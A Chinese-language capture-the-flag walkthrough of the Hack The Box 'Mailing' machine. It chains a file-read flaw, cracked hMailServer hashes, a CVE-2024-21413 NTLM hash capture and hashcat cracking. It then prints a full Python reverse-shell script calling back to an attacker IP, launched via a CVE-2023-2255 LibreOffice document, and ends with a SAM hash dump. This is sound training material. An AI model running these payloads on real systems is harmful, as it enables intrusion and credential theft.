image-20240814143958933

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
┌──(root㉿kali)-[~]
└─# dirsearch -u http://mailing.htb/   
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_mailing.htb/__24-08-14_14-13-52.txt

Target: http://mailing.htb/

[14:13:52] Starting: 
[14:13:54] 403 -  312B  - /%2e%2e//google.com
[14:13:54] 403 -  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[14:13:54] 404 -    2KB - /.ashx
[14:13:54] 404 -    2KB - /.asmx
[14:14:09] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[14:14:16] 404 -    2KB - /admin%20/
[14:14:16] 404 -    2KB - /admin.
[14:14:27] 404 -    2KB - /asset..
[14:14:27] 200 -  541B  - /assets/
[14:14:27] 301 -  160B  - /assets  ->  http://mailing.htb/assets/
[14:14:31] 403 -  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[14:14:35] 400 -    4KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[14:14:35] 200 -   31B  - /download.php
[14:14:38] 404 -    2KB - /index.php.
[14:14:40] 404 -    2KB - /javax.faces.resource.../
[14:14:40] 400 -    4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[14:14:40] 400 -    4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[14:14:40] 400 -    4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[14:14:40] 400 -    4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[14:14:40] 400 -    4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[14:14:40] 400 -    4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[14:14:40] 400 -    4KB - /jolokia/exec/java.lang:type=Memory/gc
[14:14:40] 400 -    4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[14:14:40] 400 -    4KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[14:14:40] 400 -    4KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[14:14:40] 400 -    4KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[14:14:40] 400 -    4KB - /jolokia/search/*:j2eeType=J2EEServer,*
[14:14:41] 404 -    2KB - /login.wdm%2e
[14:14:48] 404 -    2KB - /rating_over.
[14:14:49] 404 -    2KB - /service.asmx
[14:14:51] 404 -    2KB - /static..
[14:14:53] 403 -    2KB - /Trace.axd
[14:14:53] 404 -    2KB - /umbraco/webservices/codeEditorSave.asmx
[14:14:54] 404 -    2KB - /WEB-INF./
[14:14:55] 404 -    2KB - /WebResource.axd?d=LER8t9aS

Task Completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
┌──(root㉿kali)-[~]
└─# feroxbuster -u http://mailing.htb/
                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.4
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://mailing.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.4
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       94w     1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        1l        5w       31c http://mailing.htb/download.php
301      GET        2l       10w      160c http://mailing.htb/assets => http://mailing.htb/assets/
200      GET        3l       25w      541c http://mailing.htb/assets/
200      GET     2932l    17970w  1477653c http://mailing.htb/assets/mayabendito.jpg
200      GET     1144l     5804w   695263c http://mailing.htb/assets/background_image.jpg
301      GET        2l       10w      160c http://mailing.htb/Assets => http://mailing.htb/Assets/
200      GET     2485l    15038w  1505848c http://mailing.htb/assets/ruyalonso.jpg
301      GET        2l       10w      166c http://mailing.htb/instructions => http://mailing.htb/instructions/
200      GET        0l        0w  6066608c http://mailing.htb/assets/johnsmith.jpg
200      GET      132l      375w     4681c http://mailing.htb/
404      GET        0l        0w     1251c http://mailing.htb/assets/PayOnline
404      GET        0l        0w     1251c http://mailing.htb/Assets/disclosures
404      GET       42l      159w     1953c http://mailing.htb/con
404      GET       42l      159w     1960c http://mailing.htb/assets/con
404      GET        0l        0w     1251c http://mailing.htb/instructions/M
404      GET        0l        0w     1251c http://mailing.htb/assets/Impressum
404      GET        0l        0w     1251c http://mailing.htb/_Scripts
404      GET        0l        0w     1251c http://mailing.htb/instructions/case
404      GET        0l        0w     1251c http://mailing.htb/Assets/dis
404      GET        0l        0w     1251c http://mailing.htb/Assets/donation
404      GET        0l        0w     1251c http://mailing.htb/Assets/diy
404      GET       42l      159w     1960c http://mailing.htb/Assets/con
404      GET       42l      159w     1966c http://mailing.htb/instructions/con
301      GET        2l       10w      166c http://mailing.htb/Instructions => http://mailing.htb/Instructions/
404      GET       42l      159w     1953c http://mailing.htb/aux
404      GET       42l      159w     1960c http://mailing.htb/assets/aux
404      GET       42l      159w     1960c http://mailing.htb/Assets/aux
404      GET        0l        0w     1251c http://mailing.htb/Assets/galleria
404      GET       42l      159w     1966c http://mailing.htb/instructions/aux
404      GET       42l      159w     1966c http://mailing.htb/Instructions/con
404      GET        0l        0w     1251c http://mailing.htb/Instructions/_user
404      GET        0l        0w     1251c http://mailing.htb/instructions/simpletest
404      GET        0l        0w     1251c http://mailing.htb/Instructions/_svn
404      GET        0l        0w     1251c http://mailing.htb/instructions/sist
404      GET        0l        0w     1251c http://mailing.htb/Assets/BeheerSjablonen
404      GET        0l        0w     1251c http://mailing.htb/instructions/sit
404      GET        0l        0w     1251c http://mailing.htb/Instructions/_trash
404      GET        0l        0w     1251c http://mailing.htb/Instructions/_users
400      GET        6l       26w      324c http://mailing.htb/error%1F_log
400      GET        6l       26w      324c http://mailing.htb/assets/error%1F_log
400      GET        6l       26w      324c http://mailing.htb/Assets/error%1F_log
404      GET        0l        0w     1251c http://mailing.htb/assets/costasilencio
404      GET        0l        0w     1251c http://mailing.htb/instructions/TeamSpeak
400      GET        6l       26w      324c http://mailing.htb/instructions/error%1F_log
404      GET       42l      159w     1960c http://mailing.htb/assets/prn
404      GET       42l      159w     1953c http://mailing.htb/prn
404      GET       42l      159w     1960c http://mailing.htb/Assets/prn
404      GET       42l      159w     1966c http://mailing.htb/instructions/prn
400      GET        6l       26w      324c http://mailing.htb/Instructions/error%1F_log
404      GET       42l      159w     1966c http://mailing.htb/Instructions/prn
[####################] - 4m    150018/150018  0s      found:50      errors:4256   
[####################] - 4m     30000/30000   123/s   http://mailing.htb/ 
[####################] - 4m     30000/30000   122/s   http://mailing.htb/assets/ 
[####################] - 4m     30000/30000   122/s   http://mailing.htb/Assets/ 
[####################] - 4m     30000/30000   123/s   http://mailing.htb/instructions/ 
[####################] - 4m     30000/30000   130/s   http://mailing.htb/Instructions/

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n -Pn 10.10.11.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 14:22 EDT
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 14:22 (0:00:00 remaining)
Nmap scan report for 10.10.11.14
Host is up (0.071s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open  pop3          hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp open  imap          hMailServer imapd
|_imap-capabilities: ACL IMAP4rev1 CAPABILITY SORT completed IDLE CHILDREN OK RIGHTS=texkA0001 IMAP4 NAMESPACE QUOTA
445/tcp open  microsoft-ds?
465/tcp open  ssl/smtp      hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
587/tcp open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
993/tcp open  ssl/imap      hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_imap-capabilities: ACL IMAP4rev1 CAPABILITY SORT completed IDLE CHILDREN OK RIGHTS=texkA0001 IMAP4 NAMESPACE QUOTA
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-08-14T06:45:59
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -11h36m38s

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   71.82 ms 10.10.14.1
2   72.61 ms 10.10.11.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.58 seconds

单击DownLoad按钮跳转

image-20240814145355374

可能存在任意文件读取漏洞,结合操作系统进行读取

image-20240814145730092

image-20240814145555572

image-20240814145621902

image-20240814145636006

搜索得到hmail的配置文件

1
C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI

image-20240814145926973

读取

image-20240814150346646

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1a

得到两个密码

1
2
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
Password=0a9f8ad8bf896b501dde74f08efd7e4c

解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~]
└─# hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 841bb5acfa6779ae432fd7a4e6600ba7

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~]
└─# hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
-------------------------------![image-20240814150852549](C:\Users\31702\AppData\Roaming\Typora\typora-user-images\image-20240814150852549.png)-------------------
 HASH: 0a9f8ad8bf896b501dde74f08efd7e4c

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

解密第一条成功

1
841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator

image-20240814150950259

尝试telnet登录pop3

这里简单介绍一点pop3常用命令

Post Office Protocol version 3 (POP3) 是一种用于从远程邮件服务器下载电子邮件的协议。以下是一些常见的 POP3 命令以及它们的作用:

  1. USER <username>
    • 描述:指定用户名。
    • 示例USER example
  2. PASS <password>
    • 描述:指定用户的密码。
    • 示例PASS password123
  3. STAT
    • 描述:返回邮箱中的邮件数量和总大小。
    • 示例STAT
  4. LIST [msg]
    • 描述:列出邮箱中所有邮件,或者指定邮件的编号和大小。
    • 示例LISTLIST 1
  5. RETR <msg>
    • 描述:检索指定的邮件内容。
    • 示例RETR 1
  6. DELE <msg>
    • 描述:删除指定的邮件,直到会话结束前才实际删除。
    • 示例DELE 1
  7. NOOP
    • 描述:无操作,只是为了保持连接活跃。
    • 示例NOOP
  8. RSET
    • 描述:重置会话状态,取消所有已标记为删除的邮件。
    • 示例RSET
  9. QUIT
    • 描述:结束会话并关闭连接,删除所有在会话期间标记为删除的邮件。
    • 示例QUIT
  10. TOP <msg> <n>
    • 描述:检索指定邮件的前 n 行内容,不包含邮件的完整主体。
    • 示例TOP 1 10
  11. UIDL [msg]
    • 描述:唯一标识符列表,返回邮箱中每个邮件的唯一标识符。
    • 示例UIDLUIDL 1
1
2
3
4
5
telnet 10.10.11.14 110

USER administrator@mailing.htb

PASS homenetworkingadministrator
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(root㉿kali)-[~]
└─# telnet 10.10.11.14 110
Trying 10.10.11.14...
Connected to 10.10.11.14.
Escape character is '^]'.
+OK POP3
USER administrator@mailing.htb
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
LIST
+OK 2 messages (1634 octets)
1 794
2 840
.
STAT
+OK 2 1634
TOP 1 10
+OK 794 octets
Return-Path: 
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Return-Path: <>
Message-ID: <086A6A1E-84F8-4627-960C-0FB697625E26@mailing.htb>
Date: Wed, 14 Aug 2024 06:12:54 +0200
From: mailer-daemon@mailing.htb
To: administrator@mailing.htb
Subject: Message undeliverable: help
Content-Transfer-Encoding: quoted-printable
X-hMailServer-LoopCount: 1

Your message did not reach some or all of the intended recipients.

   Sent:=20
   Subject: help

The following recipient(s) could not be reached:

gregory@mailing.htb
   Error Type: SMTP
   Connection to recipients server failed.

.

CVE-2024-21413

没有看到可利用的邮件,于是找相应cve

image-20240814151813290

本地开启监听

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
┌──(root㉿kali)-[~]
└─# responder -I tun0 -v
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.50]
    Responder IPv6             [dead:beef:4::1030]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-KX82718DY7A]
    Responder Domain Name      [32ZA.LOCAL]
    Responder DCE-RPC Port     [46994]

[+] Listening for events...

发送

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~/yiyi/cve/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─# python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.12\test' --subject Hi


CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de

✅ Email sent successfully.

得到

1
maya::MAILING:5e0eb9256971de1f:DEBA7F01E81351DCFEDA3C905CA932E8:010100000000000080BA1036359FDA01E3495C93763B0B450000000002000800460042005600410001001E00570049004E002D003300410035005400350049004F00550048003800330004003400570049004E002D003300410035005400350049004F0055004800380033002E0046004200560041002E004C004F00430041004C000300140046004200560041002E004C004F00430041004C000500140046004200560041002E004C004F00430041004C000700080080BA1036359FDA010600040002000000080030003000000000000000000000000020000080F0D79319E6BB3D505B32F68F03892752BD8DD6272B1FBD42563DB8BA2BE13A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000

hashcat爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
┌──(root㉿kali)-[~/tmp]
└─# hashcat -a 0 -m 5600 1.txt /root/yiyi/rockyou.txt -o  2.txt -O
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13980HX, 2159/4382 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 27

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /root/yiyi/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MAYA::MAILING:5e0eb9256971de1f:deba7f01e81351dcfeda...000000
Time.Started.....: Wed Aug 14 05:21:13 2024 (4 secs)
Time.Estimated...: Wed Aug 14 05:21:17 2024 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (/root/yiyi/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1747.3 kH/s (0.79ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5933774/14344385 (41.37%)
Rejected.........: 2766/5933774 (0.05%)
Restore.Point....: 5931726/14344385 (41.35%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: m5478046 -> m4125022
Hardware.Mon.#1..: Util: 68%

Started: Wed Aug 14 05:20:57 2024
Stopped: Wed Aug 14 05:21:18 2024

┌──(root㉿kali)-[~/tmp]
└─# cat 2.txt               
MAYA::MAILING:5e0eb9256971de1f:deba7f01e81351dcfeda3c905ca932e8:010100000000000080ba1036359fda01e3495c93763b0b450000000002000800460042005600410001001e00570049004e002d003300410035005400350049004f00550048003800330004003400570049004e002d003300410035005400350049004f0055004800380033002e0046004200560041002e004c004f00430041004c000300140046004200560041002e004c004f00430041004c000500140046004200560041002e004c004f00430041004c000700080080ba1036359fda010600040002000000080030003000000000000000000000000020000080f0d79319e6bb3d505b32f68f03892752bd8dd6272b1fbd42563db8ba2be13a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310032000000000000000000:m4y4ngs4ri
MAYA::MAILING:5e0eb9256971de1f:deba7f01e81351dcfeda3c905ca932e8:010100000000000080ba1036359fda01e3495c93763b0b450000000002000800460042005600410001001e00570049004e002d003300410035005400350049004f00550048003800330004003400570049004e002d003300410035005400350049004f0055004800380033002e0046004200560041002e004c004f00430041004c000300140046004200560041002e004c004f00430041004c000500140046004200560041002e004c004f00430041004c000700080080ba1036359fda010600040002000000080030003000000000000000000000000020000080f0d79319e6bb3d505b32f68f03892752bd8dd6272b1fbd42563db8ba2be13a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310032000000000000000000:m4y4ngs4ri

得到

1
2
用户名maya
密码m4y4ngs4ri

evil-winrm

靶机开放了5985端口,使用evil-winrm登录

1
2
3
5985端口是Windows Remote Management(WinRM)服务的默认端口。WinRM是一种远程管理协议,用于在Windows操作系统上进行远程管理和执行命令。通过5985端口,可以使用WinRM协议与目标Windows主机建立连接,并进行诸如远程执行命令、配置管理、监视等操作。

使用WinRM我们可以在对方有设置防火墙的情况下远程管理这台服务器,因为启动WinRM服务后,防火墙默认会放行5985端口。WinRM服务在Windows Server 2012以上服务器自动启动。在WindowsVista上,服务必须手动启动。WinRM的好处在于,这种远程连接不容易被察觉到,也不会占用远程连接数!
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/tmp]
└─# evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> whoami
mailing\maya
*Evil-WinRM* PS C:\Users\maya\Documents>

桌面上找到flag1

提权

program files文件夹下找到了libreoffice组件,并且版本为7.4

icacls 命令用于在 Windows 命令提示符中 **查看和修改文件或文件夹的访问控制列表 (ACL)**。

访问控制列表 (ACL) 是一个列表,它定义了哪些用户或用户组对特定文件或文件夹具有哪些访问权限。

icacls 命令的主要功能:

  • 查看 ACL: 用于显示文件或文件夹的 ACL,包括所有者、权限和继承情况。
  • 修改 ACL: 用于添加、删除或更改文件或文件夹的 ACL 条目,例如添加新的用户或组,修改现有权限等等。
  • 备份和还原 ACL: 可以将 ACL 备份到文件,并使用备份恢复 ACL。
  • 继承控制: 可以控制 ACL 的继承方式,例如是否将父目录的 ACL 继承给子目录和文件。

CVE-2023-2255

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#shell.py
import os,socket,subprocess,threading;
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.12",9100))

p=subprocess.Popen(["cmd"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()

将shell传至桌面,然后执行CVE-2023-2255的POC

1
python3 CVE-2023-2255.py --cmd "python C:\Users\maya\Desktop\shell.py" --output 'exploit.odt'

拿到管理员的shell

将maya用户加入到管理员组中

1
crackmapexec smb 10.10.11.14 -u maya -p "m4y4ngs4ri" --sam

使用crackmapexec进行hashdump

1
2
3
4
5
6
7
8
9
10
SMB         10.10.11.14    445    MAILING          [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14    445    MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB         10.10.11.14    445    MAILING          [+] Dumping SAM hashes
SMB         10.10.11.14    445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14    445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14    445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14    445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         10.10.11.14    445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         10.10.11.14    445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         10.10.11.14    445    MAILING          [+] Added 6 SAM hashes to the database

使用evil-winrm直接登录localadmin